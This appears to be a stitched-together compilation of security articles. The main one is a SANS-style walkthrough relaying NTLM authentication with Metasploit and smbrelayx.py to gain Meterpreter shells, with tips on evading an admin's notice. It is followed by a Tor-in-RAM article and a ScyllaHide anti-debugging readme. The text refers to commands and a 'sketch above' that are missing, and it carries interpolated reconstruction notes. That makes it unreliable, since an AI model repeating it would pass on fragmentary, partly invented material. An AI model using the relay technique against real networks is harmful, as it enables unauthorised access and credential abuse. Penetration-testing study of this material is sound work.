Metasploit has an SMB Relay Module and it works wonderfully. The attacker at 10.10.12.10 sets up Metasploit as follows: I'll use a simple Windows FOR loop to simulate an administrative server scanning the network and doing inventory. On host 10.10.12.19 I run the following command. When the scanner (10.10.12.19) connects to 10.10.12.10 (our Metasploit listener) the authentication attempt is relayed to the target server (10.10.12.20). The relayed authentication happens like magic and Metasploit automatically uses the authenticated SMB session to launch the meterpreter payload on the target. Notice in the figure below that Metasploit sends an "Access Denied" back to the inventory scanner when it attempted to connect to 10.10.12.10. However, the damage is done and we get a Meterpreter shell on the attacker's machine running on the target (10.10.12.20). Today, Metasploit's SMB Relay only supports NTLMv1, so organizations can protect themselves from this attack by changing the AD policy from this setting (available in secpol.msc) ... To this... After we make the change to NTLMv2, we try Metasploit again. Now when we run the exploit, Metasploit gets a "Failed to authenticate" error message. DRAT, our dastardly plan has been foiled by modern security protocols. Metasploit has support for NTLMv2 in other exploits such as http_ntlmrelay, so I imagine this exploit will eventually support NTLMv2. But, don't worry. We've got you covered. Until then, it is PYTHON TO THE RESCUE! Two weeks ago, I showed you psexec.py in my blog post about using a Python version of psexec (SANS Penetration Testing | Psexec Python Rocks! | SANS Institute). It is a Python implementation of psexec that is distributed with the IMPACKET modules. The team writing the IMPACKET module for Python is doing some really awesome work. First of all, the modules they have written are awesome. Beyond that, they have created several example programs that demonstrate the power of their Python modules. Best of all, the SMBRELAYX.PY script that comes with IMPACKET supports NTLMv2! Sweetness, thy name is IMPACKET! Getting the script running will take a little bit of work. You'll need to download the latest version of IMPACKET and fix the module paths to get it up and running. To fix this, I put all of the examples in the same directory as the other modules and then changed the import statements to reflect the correct directories. SMBRELAYX needs an executable to run on the remote host after it authenticates. What could be better than the meterpreter? Let's use msfpayload to create a Meterpreter EXE and then set up SMBRELAYX. smbrelayx.py requires two parameters: -h is the host you are going to attack and -e is the process to launch on the remote host.
You just provide those options and sit back and wait for that inventory scanner to connect to your system. The original post shows msfpayload creating the Meterpreter executable and the invocation of smbrelayx.py (reconstructed in the sketch above). Because we are using a meterpreter reverse shell, we also have to set up Metasploit so that it is ready to receive the payload connection after it executes on the target. That is what the multi/handler exploit is for (step 2 in the sketch above).

Now, I'll simulate the scanner by attempting to connect to the C$ of our attacker's Linux box (10.10.12.10) from the scanner server (10.10.12.19). Instead of getting back an "Access Denied" like we did from Metasploit, we get back a "System cannot find the path specified" error. I like this error message. I think a system admin might question why his username and password didn't work on a target before he would question why the path doesn't exist. The smbrelayx.py script's message back to the admin therefore seems more subtle than the Metasploit message and less likely to get noticed.

Immediately we see the relay occur in the Python script. It authenticates to 10.10.12.20 and launches the meterpreter process as a service, using the username and password provided by 10.10.12.19. The payload is delivered to the target after authenticating over NTLMv2, and meterpreter is launched on the target. To keep our shell, we need to quickly migrate to another, more stable process; to help automate that migration, we could use one of the migration scripts available for the meterpreter (a short example follows below). Ah, the delicious smell of a brand new meterpreter shell.

And of course, because it is a Python module, you can incorporate this script into your own automated attack tools. Would you like more information about how you can create your own Python-powered attack tools? I'm sure you do! Join me for my brand-new SANS course, SEC573: Python for Penetration Testers. Python for Penetration Testers | Course | Python Penetration Testing

Thank you! --Mark Baggett

Source: SANS Penetration Testing | SMB Relay Demystified and NTLMv2 Pwnage with Python | SANS Institute
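Following up on the migration note above, a hedged sketch of that step (the post module name is real Metasploit; the example PID is made up):

meterpreter > run post/windows/manage/migrate    # picks/spawns a host process automatically
# or choose one yourself:
meterpreter > ps
meterpreter > migrate 1234                       # 1234 = PID of a stable process, e.g. explorer.exe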
24. Host a tor server entirely in RAM with Tor-ramdisk

Hacker10 | 7 May, 2012 | Anonymity

Tor-ramdisk is a tiny Linux distribution (5MB) developed by the IT department at D'Youville College (USA) to securely host a tor proxy server in RAM memory. It can run on old diskless hardware, and it will stop a forensic analysis by people stealing or seizing a tor server.

In the event that a tor server is seized, due to ignorance or calculated harassment (and it would not be the first time), the end user would still be safe: the chained nature of the tor proxy network makes it impossible to find out someone's computer IP by seizing a single server. But other data, even if meaningless, can still be recovered from a conventional server, so running tor in RAM is an extra security step, and it can help convince people that the machine is merely acting as a relay, as it contains no hard drive.

When a Tor-ramdisk server is powered down, all the information is erased with no possibility of recovery. The tor configuration file and private key (torrc & secret_id_key) can be preserved between reboots by exporting and importing them over FTP or SSH, which makes the life of a tor node operator easy (a minimal torrc sketch follows below). One disadvantage of running a tor node entirely in RAM memory is that it cannot host hidden services, as that requires hard drive space; other than that, it is a fully functional entry, middle, or exit node.

I would advise you to block all ports (USB, FireWire) on the server with epoxy; there are computer forensic tools that can be plugged into the USB port and make a copy of the RAM memory on the fly. You might have heard about the cold boot attack, where someone with physical access to a recently switched-off server or computer can still retrieve data remanence from RAM memory; this is not easy to achieve, and the recovery window is only a few seconds.

Visit Tor-ramdisk homepage: Tor-ramdisk | opensource.dyc.edu

Source: Host a tor server entirely in RAM with Tor-ramdisk | Hacker 10 - Security Hacker
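For reference, a minimal sketch of the kind of torrc such a relay would carry between reboots; the nickname and port are illustrative choices, not Tor-ramdisk defaults:

# torrc sketch for a non-exit (entry/middle) relay with no hidden services
Nickname MyRamRelay
ORPort 9001
SocksPort 0            # pure relay: no local client port
ExitPolicy reject *:*  # refuse all exit traffic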
25. ScyllaHide is an advanced open-source x64/x86 usermode Anti-Anti-Debug library. It hooks various functions in usermode to hide debugging. This tool is intended to stay in usermode (ring3). If you need kernelmode (ring0) Anti-Anti-Debug, see TitanHide: https://bitbucket.org/mrexodia/titanhide

ScyllaHide supports various debuggers with plugins:
- OllyDbg v1 and v2 (OllyDbg v1.10)
- x64_dbg (https://bitbucket.org/mrexodia/x64_dbg)
- Hex-Rays IDA v6+ (https://www.hex-rays.com/products/ida/)
- TitanEngine v2 (https://bitbucket.org/mrexodia/titanengine-update and TitanEngine | Open Source | ReversingLabs)

PE x64 debugging is fully supported with plugins for x64_dbg and IDA.

Please note: ScyllaHide is not limited to these debuggers. You can use the standalone commandline version of ScyllaHide, and you can inject ScyllaHide into any process debugged by any debugger.

More information is available in the documentation: https://bitbucket.org/NtQuery/scyllahide/downloads/ScyllaHide.pdf

Source code license: GNU General Public License v3 (https://www.gnu.org/licenses/gpl-3.0.en.html)

Special thanks to:
- What for his POISON Assembler source code (https://tuts4you.com/download.php?view.2281)
- waliedassar for his blog posts (waliedassar)
- Peter Ferrie for his PDFs (Homepage of Peter Ferrie)
- MaRKuS-DJM for OllyAdvanced assembler source code
- MS Spy++ style Window Finder (MS Spy++ style Window Finder - CodeProject)

Source: https://bitbucket.org/NtQuery/scyllahide
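To make the hiding concrete: the most basic checks such hooks defeat read the PEB's BeingDebugged flag or ask the kernel for a debug port. A minimal Windows-only Python sketch of those checks (illustrative only, not ScyllaHide code):

# Windows-only sketch of debugger checks that anti-anti-debug tools defeat.
# IsDebuggerPresent() just reads PEB.BeingDebugged, which ScyllaHide clears;
# CheckRemoteDebuggerPresent() wraps NtQueryInformationProcess, one of the
# usermode calls such libraries hook.
import ctypes

kernel32 = ctypes.windll.kernel32

def being_debugged():
    return bool(kernel32.IsDebuggerPresent())

def remote_debugger_attached():
    flag = ctypes.c_int(0)
    kernel32.CheckRemoteDebuggerPresent(kernel32.GetCurrentProcess(),
                                        ctypes.byref(flag))
    return bool(flag.value)

if __name__ == '__main__':
    print('BeingDebugged:', being_debugged())
    print('Remote debugger:', remote_debugger_attached())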